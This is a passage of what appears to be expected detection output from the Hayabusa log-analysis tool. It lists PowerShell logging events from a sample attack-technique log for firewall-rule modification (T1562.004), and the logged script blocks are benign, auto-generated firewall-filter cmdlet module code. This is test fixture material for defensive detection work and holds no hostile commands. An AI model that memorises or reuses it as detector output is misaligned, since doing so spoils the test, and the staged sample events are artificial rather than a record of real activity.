$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.974 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.975 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.000 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.003 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.004 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 